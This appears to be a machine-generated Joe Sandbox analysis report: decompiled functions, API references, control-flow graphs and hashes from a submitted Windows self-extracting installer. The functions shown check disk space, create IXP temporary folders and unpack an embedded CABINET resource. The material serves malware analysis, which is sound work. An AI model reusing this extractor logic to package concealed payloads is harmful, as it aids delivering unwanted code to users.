                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0xf39124 = E00F36285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E00F344B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0xf39a34 & 0x00000008;
                                                                        							if(( *0xf39a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0xf39a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0xf389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0xf39124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E00F3268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0xf39a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0xf389e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0xf39a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E00F344B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E00F344B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E00F36CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}



































                                                                        0x00f3597d
                                                                        0x00f35988
                                                                        0x00f3598f
                                                                        0x00f3599a
                                                                        0x00f359a6
                                                                        0x00f359a8
                                                                        0x00f359af
                                                                        0x00f359b9
                                                                        0x00f359dd
                                                                        0x00f359e4
                                                                        0x00f359f1
                                                                        0x00f359fe
                                                                        0x00f35a0b
                                                                        0x00f35a13
                                                                        0x00f35a19
                                                                        0x00f35a1b
                                                                        0x00f35ba1
                                                                        0x00f35baf
                                                                        0x00f35bbd
                                                                        0x00f35bd8
                                                                        0x00f35bde
                                                                        0x00f35be3
                                                                        0x00f35bec
                                                                        0x00f35bf0
                                                                        0x00f35bfc
                                                                        0x00f35c02
                                                                        0x00f35c02
                                                                        0x00f35c02
                                                                        0x00f35c04
                                                                        0x00f35c04
                                                                        0x00000000
                                                                        0x00f35c04
                                                                        0x00f35a27
                                                                        0x00f35a3a
                                                                        0x00f35a46
                                                                        0x00f35a48
                                                                        0x00f35a4a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35a64
                                                                        0x00f35a6a
                                                                        0x00f35a6c
                                                                        0x00f35abc
                                                                        0x00f35ac2
                                                                        0x00f35ac9
                                                                        0x00f35aca
                                                                        0x00f35aca
                                                                        0x00f35acc
                                                                        0x00f35acc
                                                                        0x00f35acf
                                                                        0x00f35ad1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35ad3
                                                                        0x00f35ad6
                                                                        0x00f35ad8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35ada
                                                                        0x00f35adc
                                                                        0x00f35add
                                                                        0x00f35add
                                                                        0x00f35ae0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35ae0
                                                                        0x00f35ae2
                                                                        0x00f35ae4
                                                                        0x00f35ae6
                                                                        0x00f35ae6
                                                                        0x00f35ae6
                                                                        0x00f35ae9
                                                                        0x00f35aeb
                                                                        0x00f35af0
                                                                        0x00f35af6
                                                                        0x00f35af8
                                                                        0x00f35af9
                                                                        0x00f35af9
                                                                        0x00f35afb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35afd
                                                                        0x00f35aff
                                                                        0x00f35b00
                                                                        0x00f35b03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35b03
                                                                        0x00f35b05
                                                                        0x00f35b08
                                                                        0x00f35b20
                                                                        0x00f35b27
                                                                        0x00f35b52
                                                                        0x00f35b52
                                                                        0x00f35b5b
                                                                        0x00f35b62
                                                                        0x00f35b6b
                                                                        0x00f35b6d
                                                                        0x00f35b76
                                                                        0x00f35b7d
                                                                        0x00f35b83
                                                                        0x00f35b7f
                                                                        0x00f35b7f
                                                                        0x00f35b7f
                                                                        0x00f35b6f
                                                                        0x00f35b72
                                                                        0x00f35b72
                                                                        0x00f35b85
                                                                        0x00f35b98
                                                                        0x00f35b9e
                                                                        0x00f35b87
                                                                        0x00f35b8f
                                                                        0x00f35b8f
                                                                        0x00000000
                                                                        0x00f35b85
                                                                        0x00f35b29
                                                                        0x00f35b33
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35b35
                                                                        0x00f35b48
                                                                        0x00f35b4a
                                                                        0x00000000
                                                                        0x00f35b4a
                                                                        0x00f35b0f
                                                                        0x00f35b16
                                                                        0x00000000
                                                                        0x00f35b16
                                                                        0x00f35a7c
                                                                        0x00f35a8a
                                                                        0x00f35aa5
                                                                        0x00f35aab
                                                                        0x00000000
                                                                        0x00f359bb
                                                                        0x00f359c0
                                                                        0x00f359c7
                                                                        0x00f359d1
                                                                        0x00f359d6
                                                                        0x00f35c05
                                                                        0x00f35c14
                                                                        0x00f35c14

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F359A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00F359AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F35A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00F35A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F35A64
                                                                        • memset.MSVCRT ref: 00F35A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F35A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F35AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F35BFC
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
                                                                        • API String ID: 4237285672-0
                                                                        • Opcode ID: ff6960a8a25486e6dfc58c1b0eecd0c2e421b3e5c06162678890c7b453c93b10
                                                                        • Instruction ID: a917690c52adb9a8ff3ae3ff16b1931c4f5d6122b1b08d02629a6b384c8c456b
                                                                        • Opcode Fuzzy Hash: ff6960a8a25486e6dfc58c1b0eecd0c2e421b3e5c06162678890c7b453c93b10
                                                                        • Instruction Fuzzy Hash: CF71A1B190021CAFEB25DB60CC85FFBB7ADEB88764F0441A9F445D6240DA749E85AF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 f34fe0-f3501a call f3468f FindResourceA LoadResource LockResource 377 f35161-f35163 374->377 378 f35020-f35027 374->378 379 f35057-f3505e call f34efd 378->379 380 f35029-f35051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 f35060-f35077 call f344b9 379->383 384 f3507c-f350b4 379->384 380->379 388 f35107-f3510e 383->388 389 f350b6-f350da 384->389 390 f350e8-f35104 call f344b9 384->390 391 f35110-f35117 FreeResource 388->391 392 f3511d-f3511f 388->392 401 f35106 389->401 402 f350dc 389->402 390->401 391->392 394 f35121-f35127 392->394 395 f3513a-f35141 392->395 394->395 398 f35129-f35135 call f344b9 394->398 399 f35143-f3514a 395->399 400 f3515f 395->400 398->395 399->400 404 f3514c-f35159 SendMessageA 399->404 400->377 401->388 405 f350e3-f350e6 402->405 404->400 405->390 405->401
                                                                        C-Code - Quality: 77%
                                                                        			E00F34FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0xf39144 = E00F3468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0xf39140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0xf38584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0xf38584, 0x841), 5); // executed
                                                                        				}
                                                                        				_t10 = E00F34EFD(0, 0); // executed
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E00F34CA0, E00F34CC0, E00F34980, E00F34A50, E00F34AD0, E00F34B60, E00F34BC0, 1, 0xf39148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0xf39148; // 0x0
                                                                        						_t24 =  *0xf38584; // 0x0
                                                                        						E00F344B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0xf31140, 0, E00F34CD0, 0, 0xf39140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0xf38584; // 0x0
                                                                        					E00F344B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0xf39140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0xf39140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0xf391d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E00F344B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0xf38a38 & 0x00000001) == 0 && ( *0xf39a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0xf38584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}
















                                                                        0x00f34fe0
                                                                        0x00f34fe6
                                                                        0x00f34ff9
                                                                        0x00f3500d
                                                                        0x00f35013
                                                                        0x00f3501a
                                                                        0x00f35163
                                                                        0x00f35163
                                                                        0x00f35020
                                                                        0x00f35027
                                                                        0x00f35037
                                                                        0x00f35051
                                                                        0x00f35051
                                                                        0x00f35057
                                                                        0x00f3505e
                                                                        0x00f350a7
                                                                        0x00f350ad
                                                                        0x00f350b4
                                                                        0x00f350e8
                                                                        0x00f350e8
                                                                        0x00f350ee
                                                                        0x00f350ff
                                                                        0x00f35104
                                                                        0x00f35106
                                                                        0x00000000
                                                                        0x00f35106
                                                                        0x00f350cd
                                                                        0x00f350d3
                                                                        0x00f350da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f350dd
                                                                        0x00f350e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35060
                                                                        0x00f35060
                                                                        0x00f35070
                                                                        0x00f35075
                                                                        0x00f35107
                                                                        0x00f35107
                                                                        0x00f3510e
                                                                        0x00f35111
                                                                        0x00f35117
                                                                        0x00f35117
                                                                        0x00f3511f
                                                                        0x00f35121
                                                                        0x00f35127
                                                                        0x00f35135
                                                                        0x00f35135
                                                                        0x00f35127
                                                                        0x00f35141
                                                                        0x00f35159
                                                                        0x00f35159
                                                                        0x00000000
                                                                        0x00f3515f

                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F34FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00F35006
                                                                        • LockResource.KERNEL32(00000000), ref: 00F3500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00F35030
                                                                        • ShowWindow.USER32(00000000), ref: 00F35037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00F3504A
                                                                        • ShowWindow.USER32(00000000), ref: 00F35051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F35111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F35159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        • Opcode ID: 2c99b5735833c1949fe1692f5b6331ce9b042078422ce63298a6df6ccdc37a08
                                                                        • Instruction ID: 663da06252f018073ef754636364ac6e542085de5f38a7ed94d222ece9f254d9
                                                                        • Opcode Fuzzy Hash: 2c99b5735833c1949fe1692f5b6331ce9b042078422ce63298a6df6ccdc37a08
                                                                        • Instruction Fuzzy Hash: 7331E9B0B4470A7BD7207B62AD89F67366EB744BB5F040024FD41A21A1DBF9EC00BA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E00F353A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
                                                                        					E00F3171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E00F31680(_t32, 0x104, _t20);
                                                                        					E00F3658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E00F36CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0xf38a20 = 1;
                                                                        				goto L5;
                                                                        			}

















                                                                        0x00f353ac
                                                                        0x00f353b3
                                                                        0x00f353b9
                                                                        0x00f353bb
                                                                        0x00f353bd
                                                                        0x00f353bf
                                                                        0x00f353d1
                                                                        0x00f353d6
                                                                        0x00f353e0
                                                                        0x00f353e2
                                                                        0x00f353f5
                                                                        0x00f353fb
                                                                        0x00f35402
                                                                        0x00f3540b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35413
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35415
                                                                        0x00f35416
                                                                        0x00f35427
                                                                        0x00f3542a
                                                                        0x00f3542b
                                                                        0x00f35434
                                                                        0x00f35434
                                                                        0x00f3543a
                                                                        0x00f3544c
                                                                        0x00f3544c
                                                                        0x00f35452
                                                                        0x00f3545a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3545e
                                                                        0x00f3545f
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F3171E: _vsnprintf.MSVCRT ref: 00F31750
                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F353FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F3542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F35452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1231568684
                                                                        • Opcode ID: 36ba9fc2ab00bf384b808ab713d420ed779282bf6471af8ead029b980d46f88d
                                                                        • Instruction ID: 8e49f893279f36dbc623c9404a303f9ca69e727fce39127a5cc24555be1de08c
                                                                        • Opcode Fuzzy Hash: 36ba9fc2ab00bf384b808ab713d420ed779282bf6471af8ead029b980d46f88d
                                                                        • Instruction Fuzzy Hash: C811E7B170060877D7289B369C49FEF766EEFC5731F000125F986D2290DE788946A6A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 f35467-f35484 479 f3548a-f35490 call f353a1 478->479 480 f3551c-f35528 call f31680 478->480 483 f35495-f35497 479->483 484 f3552d-f35539 call f358c8 480->484 485 f35581-f35583 483->485 486 f3549d-f354c0 call f31781 483->486 493 f3553b-f35545 CreateDirectoryA 484->493 494 f3554d-f35552 484->494 488 f3558d-f3559d call f36ce0 485->488 495 f354c2-f354d8 GetSystemInfo 486->495 496 f3550c-f3551a call f3658a 486->496 498 f35577-f3557c call f36285 493->498 499 f35547 493->499 500 f35585-f3558b 494->500 501 f35554-f35557 call f3597d 494->501 504 f354da-f354dd 495->504 505 f354fe 495->505 496->484 498->485 499->494 500->488 511 f3555c-f3555e 501->511 509 f354f7-f354fc 504->509 510 f354df-f354e2 504->510 512 f35503-f35507 call f3658a 505->512 509->512 513 f354f0-f354f5 510->513 514 f354e4-f354e7 510->514 511->500 515 f35560-f35566 511->515 512->496 513->512 514->496 517 f354e9-f354ee 514->517 515->485 518 f35568-f35575 RemoveDirectoryA 515->518 517->512 518->485
                                                                        C-Code - Quality: 75%
                                                                        			E00F35467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0xf391e4;
                                                                        					_t42 = 0x104;
                                                                        					E00F31680(0xf391e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E00F358C8(_t48); // executed
                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0xf39124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E00F36CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E00F3597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0xf38a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0xf38a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0xf39124 = E00F36285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0xf38a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E00F353A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
